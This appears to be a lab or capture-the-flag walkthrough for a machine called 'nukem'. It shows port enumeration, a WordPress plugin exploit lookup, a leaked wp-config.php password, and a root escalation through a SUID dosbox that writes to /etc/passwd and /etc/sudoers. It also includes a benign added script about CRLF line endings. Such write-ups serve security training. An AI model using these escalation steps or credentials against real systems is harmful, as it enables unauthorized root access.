Enumeration
PORT       STATE  SERVICE      VERSION
22/tcp     open   ssh          OpenSSH 8.3 (protocol 2.0)
80/tcp     open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
3306/tcp   open   mysql
5000/tcp   open   http         Werkzeug httpd 1.0.1 (Python 3.8.5)
13000/tcp  open   http         nginx 1.18.0
36445/tcp  open   netbios-ssn  Samba smbd 4.6.2
In total, 6 ports are open.
Port 22
Port 22 is running OpenSSH 8.3, for which I haven't seen any vuln so far.
Port 80
$ searchsploit -m 48979   # WordPress plugin Simple File List
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'commander' );
/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Privilege Escalation
Using https://linux.die.net/man/1/dosbox
# dosbox is a DOS emulator; it opens its command prompt in a GUI window
# that display is only reachable through VNC on localhost:5901, so we
# port forward over ssh (commander's password comes from wp-config.php)
# to connect to VNC via localhost
$ ssh -L 5901:localhost:5901 commander@192.168.125.105
# connect a VNC client to localhost:5901 and run /usr/bin/dosbox
# it opens a DOS-style command prompt (Z:\>), which looks like Windows
# searching for a SUID /usr/bin/dosbox privesc > https://github.com/liwuqi/huck-box/blob/master/my_notes
# dosbox runs as root, so anything written from its DOS shell is written as root
# we can mount the host filesystem using MOUNT <drive> <path>
Z:\> MOUNT k /
Mounting / is NOT recommended. Please mount a (sub)directory next time.
Drive k is mounted as local directory /.
Z:\> k:
# we are now under the / filesystem as drive K:
# /root/proof.txt is readable from here, but we want an interactive root shell
# first attempt: append a uid 0 user to /etc/passwd
K:\> echo 'kashz:cAZZtf3ncxRAY:0:0:root:/root:/bin/bash' >> /etc/passwd
[commander@nukem ~]$ su kashz
Password:
Warning: your password will expire in 32558 days.
: No such file or directorybash
# not working: DOSBox's ECHO >> writes DOS line endings, so the shell field
# of the new entry is "/bin/bash\r" and su cannot exec it; the stray CR is
# also what overwrites the start of the error line above
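As an added example, not part of the original writeup: a small POSIX shell script that reproduces what DOSBox's `ECHO ... >>` did to the passwd entry, checks an entry for the carriage-return and field-count problems before it is trusted, and strips the CRs from a file once you have write access from a real shell. The scratch file, the kashz username and the hash are illustrative values taken from the writeup; `dosbox_append` is a stand-in for DOSBox's redirect, not the emulator itself.

```sh
#!/bin/sh
# Added example (not from the original writeup). Demonstrates the DOSBox
# CRLF pitfall on a scratch copy of a passwd file. Names, hash and paths
# are illustrative only.

CR=$(printf '\r')

# Emulate a DOSBox "ECHO line >> file": the line is CRLF terminated.
dosbox_append() {
    # $1 = line to append, $2 = target file
    printf '%s\r\n' "$1" >> "$2"
}

# Return 0 if a passwd entry is usable: no carriage return, exactly
# 7 colon-separated fields, and a shell given as an absolute path.
check_passwd_line() {
    entry=$1
    case $entry in
        *"$CR"*) echo "bad entry: carriage return present" >&2; return 1 ;;
    esac
    nf=$(printf '%s\n' "$entry" | awk -F: '{ print NF }')
    if [ "$nf" -ne 7 ]; then
        echo "bad entry: expected 7 fields, got $nf" >&2; return 1
    fi
    shell=${entry##*:}
    case $shell in
        /*) return 0 ;;
        *)  echo "bad entry: shell '$shell' is not an absolute path" >&2; return 1 ;;
    esac
}

# Remove CRs from every line of a file in place (the repair to run from
# a normal shell once the file is writable by you).
strip_cr() {
    tmp=$(mktemp) || return 1
    tr -d '\r' < "$1" > "$tmp" && cat "$tmp" > "$1"
    rm -f "$tmp"
}

# Last line of a file, to inspect what the DOS-side redirect produced.
last_line() {
    tail -n 1 "$1"
}

demo() {
    f=$(mktemp)
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$f"
    dosbox_append 'kashz:cAZZtf3ncxRAY:0:0:root:/root:/bin/bash' "$f"
    if check_passwd_line "$(last_line "$f")"; then
        echo "entry as written by DOSBox: OK"
    else
        echo "entry as written by DOSBox: rejected (this is what su tripped over)"
    fi
    strip_cr "$f"
    check_passwd_line "$(last_line "$f")" && echo "after strip_cr: OK"
    rm -f "$f"
}

demo
```

The check is deliberately strict about the shell field because that is the field su actually execs; a trailing CR there is invisible in `cat` output but fatal at login.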
# second attempt: add commander to sudoers, again from dosbox's K: drive
K:\> echo commander ALL=(ALL) NOPASSWD:ALL >> /etc/sudoers
# back in the ssh shell
[commander@nukem ~]$ sudo su
[root@nukem commander]# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
nukem